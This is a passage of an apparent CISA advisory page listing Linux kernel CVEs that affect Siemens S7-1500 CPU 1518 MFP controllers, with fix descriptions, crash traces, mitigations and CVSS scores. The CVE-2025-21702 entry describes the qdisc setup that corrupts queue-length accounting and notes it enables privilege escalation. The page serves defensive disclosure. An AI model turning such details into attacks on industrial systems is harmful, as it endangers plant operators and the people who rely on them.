<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21648</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: conntrack: clamp maximum hashtable size to INT_MAX Use INT_MAX as maximum size for the conntrack hashtable. Otherwise, it is possible to hit WARN_ON_ONCE in __kvmalloc_node_noprof() when resizing hashtable because __GFP_NOWARN is unset. See: 0708a0afe291 ("mm: Consider __GFP_NOWARN flag for oversized kvmalloc() calls") Note: hashtable resize is only possible from init_netns.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21648">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/789.html">CWE-789 Memory Allocation with Excessive Size Value</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21655</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: io_uring/eventfd: ensure io_eventfd_signal() defers another RCU period io_eventfd_do_signal() is invoked from an RCU callback, but when dropping the reference to the io_ev_fd, it calls io_eventfd_free() directly if the refcount drops to zero. This isn't correct, as any potential freeing of the io_ev_fd should be deferred another RCU grace period. Just call io_eventfd_put() rather than open-code the dec-and-test and free, which will correctly defer it another RCU grace period.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21655">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/362.html">CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21676</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: fec: handle page_pool_dev_alloc_pages error The fec_enet_update_cbd function calls page_pool_dev_alloc_pages but did not handle the case when it returned NULL. There was a WARN_ON(!new_page) but it would still proceed to use the NULL pointer and then crash. This case does seem somewhat rare but when the system is under memory pressure it can happen. One case where I can duplicate this with some frequency is when writing over a smbd share to a SATA HDD attached to an imx6q. Setting /proc/sys/vm/min_free_kbytes to higher values also seems to solve the problem for my test case. But it still seems wrong that the fec driver ignores the memory allocation error and can crash. This commit handles the allocation error by dropping the current packet.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21676">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21682</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: eth: bnxt: always recalculate features after XDP clearing, fix null-deref Recalculate features when XDP is detached. Before: # ip li set dev eth0 xdp obj xdp_dummy.bpf.o sec xdp # ip li set dev eth0 xdp off # ethtool -k eth0 | grep gro rx-gro-hw: off [requested on] After: # ip li set dev eth0 xdp obj xdp_dummy.bpf.o sec xdp # ip li set dev eth0 xdp off # ethtool -k eth0 | grep gro rx-gro-hw: on The fact that HW-GRO doesn't get re-enabled automatically is just a minor annoyance. The real issue is that the features will randomly come back during another reconfiguration which just happens to invoke netdev_update_features(). The driver doesn't handle reconfiguring two things at a time very robustly. Starting with commit 98ba1d931f61 ("bnxt_en: Fix RSS logic in __bnxt_reserve_rings()") we only reconfigure the RSS hash table if the "effective" number of Rx rings has changed. If HW-GRO is enabled "effective" number of rings is 2x what user sees. So if we are in the bad state, with HW-GRO re-enablement "pending" after XDP off, and we lower the rings by / 2 - the HW-GRO rings doing 2x and the ethtool -L doing / 2 may cancel each other out, and the: if (old_rx_rings != bp-&gt;hw_resc.resv_rx_rings &amp;&amp; condition in __bnxt_reserve_rings() will be false. The RSS map won't get updated, and we'll crash with: BUG: kernel NULL pointer dereference, address: 0000000000000168 RIP: 0010:__bnxt_hwrm_vnic_set_rss+0x13a/0x1a0 bnxt_hwrm_vnic_rss_cfg_p5+0x47/0x180 __bnxt_setup_vnic_p5+0x58/0x110 bnxt_init_nic+0xb72/0xf50 __bnxt_open_nic+0x40d/0xab0 bnxt_open_nic+0x2b/0x60 ethtool_set_channels+0x18c/0x1d0 As we try to access a freed ring. The issue is present since XDP support was added, really, but prior to commit 98ba1d931f61 ("bnxt_en: Fix RSS logic in __bnxt_reserve_rings()") it wasn't causing major issues.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21682">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21702</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: pfifo_tail_enqueue: Drop new packet when sch-&gt;limit == 0 Expected behaviour: In case we reach scheduler's limit, pfifo_tail_enqueue() will drop a packet in scheduler's queue and decrease scheduler's qlen by one. Then, pfifo_tail_enqueue() enqueue new packet and increase scheduler's qlen by one. Finally, pfifo_tail_enqueue() return `NET_XMIT_CN` status code. Weird behaviour: In case we set `sch-&gt;limit == 0` and trigger pfifo_tail_enqueue() on a scheduler that has no packet, the 'drop a packet' step will do nothing. This means the scheduler's qlen still has value equal 0. Then, we continue to enqueue new packet and increase scheduler's qlen by one. In summary, we can leverage pfifo_tail_enqueue() to increase qlen by one and return `NET_XMIT_CN` status code. The problem is: Let's say we have two qdiscs: Qdisc_A and Qdisc_B. - Qdisc_A's type must have '-&gt;graft()' function to create parent/child relationship. Let's say Qdisc_A's type is `hfsc`. Enqueue packet to this qdisc will trigger `hfsc_enqueue`. - Qdisc_B's type is pfifo_head_drop. Enqueue packet to this qdisc will trigger `pfifo_tail_enqueue`. - Qdisc_B is configured to have `sch-&gt;limit == 0`. - Qdisc_A is configured to route the enqueued's packet to Qdisc_B. Enqueue packet through Qdisc_A will lead to: - hfsc_enqueue(Qdisc_A) -&gt; pfifo_tail_enqueue(Qdisc_B) - Qdisc_B-&gt;q.qlen += 1 - pfifo_tail_enqueue() return `NET_XMIT_CN` - hfsc_enqueue() check for `NET_XMIT_SUCCESS` and see `NET_XMIT_CN` =&gt; hfsc_enqueue() don't increase qlen of Qdisc_A. The whole process lead to a situation where Qdisc_A-&gt;q.qlen == 0 and Qdisc_B-&gt;q.qlen == 1. Replace 'hfsc' with other type (for example: 'drr') still lead to the same problem. This violate the design where parent's qlen should equal to the sum of its childrens'qlen. Bug impact: This issue can be used for user-&gt;kernel privilege escalation when it is reachable.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21702">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21705</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mptcp: handle fastopen disconnect correctly Syzbot was able to trigger a data stream corruption: WARNING: CPU: 0 PID: 9846 at net/mptcp/protocol.c:1024 __mptcp_clean_una+0xddb/0xff0 net/mptcp/protocol.c:1024 Modules linked in: CPU: 0 UID: 0 PID: 9846 Comm: syz-executor351 Not tainted 6.13.0-rc2-syzkaller-00059-g00a5acdbf398 #0 Hardware name: Google Compute Engine/Google Compute Engine, BIOS Google 11/25/2024 RIP: 0010:__mptcp_clean_una+0xddb/0xff0 net/mptcp/protocol.c:1024 Code: fa ff ff 48 8b 4c 24 18 80 e1 07 fe c1 38 c1 0f 8c 8e fa ff ff 48 8b 7c 24 18 e8 e0 db 54 f6 e9 7f fa ff ff e8 e6 80 ee f5 90 &lt;0f&gt; 0b 90 4c 8b 6c 24 40 4d 89 f4 e9 04 f5 ff ff 44 89 f1 80 e1 07 RSP: 0018:ffffc9000c0cf400 EFLAGS: 00010293 RAX: ffffffff8bb0dd5a RBX: ffff888033f5d230 RCX: ffff888059ce8000 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 RBP: ffffc9000c0cf518 R08: ffffffff8bb0d1dd R09: 1ffff110170c8928 R10: dffffc0000000000 R11: ffffed10170c8929 R12: 0000000000000000 R13: ffff888033f5d220 R14: dffffc0000000000 R15: ffff8880592b8000 FS: 00007f6e866496c0(0000) GS:ffff8880b8600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f6e86f491a0 CR3: 00000000310e6000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: __mptcp_clean_una_wakeup+0x7f/0x2d0 net/mptcp/protocol.c:1074 mptcp_release_cb+0x7cb/0xb30 net/mptcp/protocol.c:3493 release_sock+0x1aa/0x1f0 net/core/sock.c:3640 inet_wait_for_connect net/ipv4/af_inet.c:609 [inline] __inet_stream_connect+0x8bd/0xf30 net/ipv4/af_inet.c:703 mptcp_sendmsg_fastopen+0x2a2/0x530 net/mptcp/protocol.c:1755 mptcp_sendmsg+0x1884/0x1b10 net/mptcp/protocol.c:1830 sock_sendmsg_nosec net/socket.c:711 [inline] __sock_sendmsg+0x1a6/0x270 net/socket.c:726 ____sys_sendmsg+0x52a/0x7e0 net/socket.c:2583 ___sys_sendmsg net/socket.c:2637 [inline] __sys_sendmsg+0x269/0x350 net/socket.c:2669 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f6e86ebfe69 Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 b1 1f 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 &lt;48&gt; 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f6e86649168 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 00007f6e86f491b8 RCX: 00007f6e86ebfe69 RDX: 0000000030004001 RSI: 0000000020000080 RDI: 0000000000000003 RBP: 00007f6e86f491b0 R08: 00007f6e866496c0 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 00007f6e86f491bc R13: 000000000000006e R14: 00007ffe445d9420 R15: 00007ffe445d9508 The root cause is the bad handling of disconnect() generated internally by the MPTCP protocol in case of connect FASTOPEN errors. Address the issue increasing the socket disconnect counter even on such a case, to allow other threads waiting on the same socket lock to properly error out.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21705">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21706</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mptcp: pm: only set fullmesh for subflow endp With the in-kernel path-manager, it is possible to change the 'fullmesh' flag. The code in mptcp_pm_nl_fullmesh() expects to change it only on 'subflow' endpoints, to recreate more or less subflows using the linked address. Unfortunately, the set_flags() hook was a bit more permissive, and allowed 'implicit' endpoints to get the 'fullmesh' flag while it is not allowed before. That's what syzbot found, triggering the following warning: WARNING: CPU: 0 PID: 6499 at net/mptcp/pm_netlink.c:1496 __mark_subflow_endp_available net/mptcp/pm_netlink.c:1496 [inline] WARNING: CPU: 0 PID: 6499 at net/mptcp/pm_netlink.c:1496 mptcp_pm_nl_fullmesh net/mptcp/pm_netlink.c:1980 [inline] WARNING: CPU: 0 PID: 6499 at net/mptcp/pm_netlink.c:1496 mptcp_nl_set_flags net/mptcp/pm_netlink.c:2003 [inline] WARNING: CPU: 0 PID: 6499 at net/mptcp/pm_netlink.c:1496 mptcp_pm_nl_set_flags+0x974/0xdc0 net/mptcp/pm_netlink.c:2064 Modules linked in: CPU: 0 UID: 0 PID: 6499 Comm: syz.1.413 Not tainted 6.13.0-rc5-syzkaller-00172-gd1bf27c4e176 #0 Hardware name: Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 RIP: 0010:__mark_subflow_endp_available net/mptcp/pm_netlink.c:1496 [inline] RIP: 0010:mptcp_pm_nl_fullmesh net/mptcp/pm_netlink.c:1980 [inline] RIP: 0010:mptcp_nl_set_flags net/mptcp/pm_netlink.c:2003 [inline] RIP: 0010:mptcp_pm_nl_set_flags+0x974/0xdc0 net/mptcp/pm_netlink.c:2064 Code: 01 00 00 49 89 c5 e8 fb 45 e8 f5 e9 b8 fc ff ff e8 f1 45 e8 f5 4c 89 f7 be 03 00 00 00 e8 44 1d 0b f9 eb a0 e8 dd 45 e8 f5 90 &lt;0f&gt; 0b 90 e9 17 ff ff ff 89 d9 80 e1 07 38 c1 0f 8c c9 fc ff ff 48 RSP: 0018:ffffc9000d307240 EFLAGS: 00010293 RAX: ffffffff8bb72e03 RBX: 0000000000000000 RCX: ffff88807da88000 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 RBP: ffffc9000d307430 R08: ffffffff8bb72cf0 R09: 1ffff1100b842a5e R10: dffffc0000000000 R11: ffffed100b842a5f R12: ffff88801e2e5ac0 R13: ffff88805c214800 R14: ffff88805c2152e8 R15: 1ffff1100b842a5d FS: 00005555619f6500(0000) GS:ffff8880b8600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000020002840 CR3: 00000000247e6000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: genl_family_rcv_msg_doit net/netlink/genetlink.c:1115 [inline] genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline] genl_rcv_msg+0xb14/0xec0 net/netlink/genetlink.c:1210 netlink_rcv_skb+0x1e3/0x430 net/netlink/af_netlink.c:2542 genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219 netlink_unicast_kernel net/netlink/af_netlink.c:1321 [inline] netlink_unicast+0x7f6/0x990 net/netlink/af_netlink.c:1347 netlink_sendmsg+0x8e4/0xcb0 net/netlink/af_netlink.c:1891 sock_sendmsg_nosec net/socket.c:711 [inline] __sock_sendmsg+0x221/0x270 net/socket.c:726 ____sys_sendmsg+0x52a/0x7e0 net/socket.c:2583 ___sys_sendmsg net/socket.c:2637 [inline] __sys_sendmsg+0x269/0x350 net/socket.c:2669 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f5fe8785d29 Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 &lt;48&gt; 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007fff571f5558 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 00007f5fe8975fa0 RCX: 00007f5fe8785d29 RDX: 0000000000000000 RSI: 0000000020000480 RDI: 0000000000000007 RBP: 00007f5fe8801b08 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f5fe8975fa0 R14: 00007f5fe8975fa0 R15: 000000 ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21706">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
